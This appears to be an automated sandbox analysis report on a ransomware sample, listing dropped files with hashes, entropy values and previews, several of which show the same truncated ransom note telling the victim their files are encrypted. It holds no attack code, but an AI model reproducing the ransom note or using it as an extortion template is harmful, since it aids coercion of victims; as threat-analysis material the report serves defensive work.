.n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:true
                            Reputation:low
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:true
                            Reputation:low
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Reputation:low
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Reputation:low
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Reputation:low
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Reputation:low
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Reputation:low
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65760
                            Entropy (8bit):7.99717783382961
                            Encrypted:true
                            SSDEEP:768:xfMpkalgQvb96FQnJYLnxcKMljk4W6sIkdy6ewJPniH1ttHWDZuLTdGck/HXY56V:BMuFzNLMhCr1JC1H42k/3Y0vKH8u07
                            MD5:B35AB9402E0860EE761F36AF27F047C4
                            SHA1:5F39585EE92C6E35A3EE3631B9230AE04BC52CA0
                            SHA-256:3533D73C08840F171FA96D636B55E09D4E75F87D4357A61ED48AABF69377906A
                            SHA-512:09C0D54EE47B41425B3F7DA18A7A8313505E1511ED5DAE8B2CFDE45117AF8318F3BD044D72EB72D20ECD11D9AF8A0A00B2CBC92AD7889119D8F356BAD1F6D576
                            Malicious:false
                            Preview:...J.....6m...{.*..M...+..8G......K...R......7.}H._..7..........$,E....'C&\.{.#.D..6.......h...dscB).N...V.....g.....y.a....v7...t^D.... .,...Jk.i....a`.f...x.........d.o...$x...Q..}.......Z..t..R...Z...H.. N.MUF.t..$.<._e=.U%.u...Y%.i........N..g....6.^.)"[..V.c....*....&...#.`...u..SI.DJV...:3C9...Ch..6..8.Z...S.`......e;........-gbiI..7P..2...~..!.|4......*3.@....T)I.&......jo<..s.}.f.:..kD.......S.&..w.YW.k.{.;.y......j..z.U.|4.;^Z........hy.1...(..<D.C).{5..~t..D.d...%.L.X.L.....V.e.......4.."Eh....FLp.g._...6}d...)..S...B..qh.'49.K...C..Y...cO.U..._.d1..h.....IF.t\..X.n..........N|.r.U|.D....O..\.$..z.ae..%..?B.+..1... ....).....l..P........,.>_#...q<.\.V...P.a........".+|l...o.....m..:..~.C.I=s..../..+.U....l...w!P......qyIqW.ZC.&...h^.0Jn...8Q.~Z.J.F3S..AY.'...t&.>.GR...{.aJ\!..Y.....xj..*.,.v....~...f.6...].[[..s....%..xk..9...5..(.t.>..%&*;......I..WC.....kk..\^..O....a,%.7.o.u|..C~...{.:5..ss.._i..h...qq..!R.E..)7........v.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):20704
                            Entropy (8bit):7.98948247213665
                            Encrypted:false
                            SSDEEP:384:sZ4DQyr2GPkZMTk8JltBAcCJByblkvPhRShUSSg+7/r5Giovi+egHR9:sZYV4Zx+AcCTM+PhshUSS7/9GiiXD
                            MD5:E6D89F490EF16D04E1BC044E35D0A223
                            SHA1:4D14F7B80D5C0ED28B7E143E658BFCDC47713DD0
                            SHA-256:50D3E3DF3DEE66225FFC791FBD8763BC8E4D0B4AD33380746CA6DB37B6485FEF
                            SHA-512:5A468ED7C6DED6A628E1C9E4E2F485632FFD2EA001D5D9824A4C37E6A105051A466B5B781AEBEB078C33126F04DE13F7FBFDA636849B31A9018763BF03F1A2AF
                            Malicious:false
                            Preview:.+...W..gq..;......f...3Pi|b"LV.;....A.3+...<..Q^...Q._`.# .s..&9...JJ.l.....&.#..f...gxv]..L...J...}...]X.....c...M..T.7....Op.^..%..u..tU...........VO......G71..........p.R..).....6...0Er.+.?5}...}1.....c...L.5..6'...9....i?y.F....n.8Ty..J..2L.cy.9..U.sV...l..}6....sH(A..Ac...8........./o.....!....[..Q...<d.C......C...isa.3.H-.-...s.]...".."_...*.;.[...3a.nQ.b...!.A...FD....'8"J..WIX..3..f..@o$".&... .;.kj.o..Zs..H-..^M......pp.61.V.......0.E.1.........-..x....o<.dAc..A9P...@..zLl..........@.:"..u..&..].C....3U..)m~K.P...!`9...|.....A........4..".t....O.<.A......s....+...3V...?BuD...$.>....5$....?...d.{.r.......c...8U....bP]^;$p....{..W.s.'...[..=e[....2jsi....r.l...mY....0rZ..U...D-..jO.:J.{....q..e..M.\...<o.2(..'n.xo(....Xl..X....tv.. f.e{....<_...>......e./.u.=..t..!...l3.$k..:.Iz...'..X..].....v....],vZ..a.....B........8........B.-q.a.P....F.3b.{.z.".".........:E.{.^.zYU...~}.p...YNQ..........Dfw.F...........`..'.l
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65760
                            Entropy (8bit):7.997304750087416
                            Encrypted:true
                            SSDEEP:1536:TRgXH6sHZWjpQCgtubYltvAslEo908lbhKDaElaBnsw7WT7Rb3PF:TRwH6sHZWF2tPvAsRq8lEuEysaC7p3PF
                            MD5:341B85D11F8352FA39525DC98D491713
                            SHA1:951C86F73F5994F5D0312C196E4620EFD1909504
                            SHA-256:0B4999B43656EA98607C132F6FFA180735D113A2A74CB5ACC96F2BE688C960B3
                            SHA-512:360404C5F2124541AB40F83FA615DB674BBD117A3617CE3E22334DA3D7473D1FD4ADCB6D2EF1A3E89C5820A000684EF6D37A7690E1DE888A90E6FCD8ADE380BF
                            Malicious:false
                            Preview:..6F.w.;>`Zh..[mq]_&c.*.>_c.2...`....^.....F....8)#..w..h7...#sd.MO|.....~...0.....aKHb..-k..7...._n.q.vC{..f...s....n..5..hB..ef...Tj2@..k.p...i.s.....F..7..._..Pg..4.0.\.7.....i#Jw.W.gDU.':.P..i9b.k,R...0.aK.. ./X.g..._SY....B.?....'4.2%..jT...`.~......Q`(.=.K...;r.G.....QeV?.K..#.rqM.*........./O...G.c...4..E1.2.&.7J.;..}..|.p.Nh.8Es5g.W.z{IV..K.P..K..V.%....v..O......mDD8;X.2..Lk..z....~C.Q..2+.OBv.c7.S3......uD..77..1.X..X....&1.=.Lv..=C.)c(.".qa...R...&.....zQ#..(,...r....|yCy#..K..A).>|..........i..UW........*Kw.y+.H...R."..I..C..]R..:...T.:.T. .M...D.,H6..|.0H.%..^ B....r..7Q.n.b.'.. 4..(..|....a....8.x.N.r.z:O.m..{...yU|..g...~N^P.ef>.$....c....n.Uj......Lo..L.^F......}.F......(......K.....lJ*.7...r.........*-.H.{.i.s.;.'f...W.....b.. T.!.:.q..au...T8..T.....7^.T..>qp"O..m........~F..Ie]y.@YEAh........@...T...2Q.c........".i....e.....y.G=...C.<`.."....L.....O;....8...7.8..De....U...BU8o6.~......@8...$..G..L%... .l.mo....Q.......o.|
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):524512
                            Entropy (8bit):7.999713147043193
                            Encrypted:true
                            SSDEEP:12288:FWeSHeV3xGPl4FJ3nvTZEe49Qy0DyQLMPqa30pClf:FV0eV4+FJ3vWd9QxyGMR3Sgf
                            MD5:5219CC803FC026A1AA07B57DC7C2AE55
                            SHA1:CB6B296FA3B4AE84502A297E08D6DC0AFB672092
                            SHA-256:495C95785573F9ADA47DDD70D032937F3324570D52CB7E7DCB06D68A8C883496
                            SHA-512:A3AD3462CCBD75852567A8159613950C09D6AEFB3F50360DC421B3BF283321686793775965E5551FBBB8CA381783973DB65891BE40DB89FC8712619F852E9AC8
                            Malicious:false
                            Preview:w....! .p.z!..J..=..m,..).I-....LJ...\0.`\RE..&g.8n.....3}.X.U.r....W.).....u.$..z..[p8.h.h.k.K...Y.;!..k...`.sR...b\.n?l*..-.....t........"jl...7!..........??..[..i..\E...Q....#;.x...w..(7.T.bh.....:..!..A.m..}...9g-.....QW..GU.....,...."...,fS.~.E>.,.Vju...\..,...'.D...7.ncLs/..O.. (....>6.q.....I......\.|&.....*S.....]/.*R]../.t.`..r.k."&...X......f..eC...._....0....C....ojM..P...]K..$b..$h1..p`.....j.....<.s4[....n..r&)q..H..........%..\....8...H...`'....p......^5.........e.[...xR.+t.sh.+I~..oQ..;......pV....N...i.[..:..)P.f?...#i..%-...aZ.H...U}..D.X...]..p.p..n...g...r%.$.-..?..f'.\..Bl7n/..i...."&/c@..^...{"3'U.UL.?.z`..7..L...%.h\N....i"@.AJm.k...2.3.c.....b...!.*....f.xj.|R.P.g.L......%.>...l........A.'a.........m[..w:.........Dj.l..q..;. ..ws.J@.~z..W7..9.iSy.&.. .`..}... .f.~Uv..VO...B...x....7.Dy.$...^.u..i..\d.. .Mq.o!...............S9T..s..@...3............:=...#.b)......'......m..eU2...y.<.....T../.**.n.Q..b
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):524512
                            Entropy (8bit):7.999612933933582
                            Encrypted:true
                            SSDEEP:12288:fD1YIZMkT3MXUjq2r8nIAtgCJ0meYX2Okwx++kOTt5M4JJ:G4Ukqs8X4S/Tt5t
                            MD5:911E7DDB9505EF15FF0042BEED9FEDD9
                            SHA1:2560C1F39A455B1A984185845455CAB7BA665695
                            SHA-256:9C830BB1B25168BF9F10E6E7F0098E298ED6D4F5B0674C1CAD5073EC4B0DC652
                            SHA-512:3B7206E0D09D609739F284D19659B435B05BA060098B0704BFA9772D00E9FE09CDE1ECC9B1C9FE0F050BCCFC89A577D69EB5CB7D448444624B5A7C48B8101174
                            Malicious:false
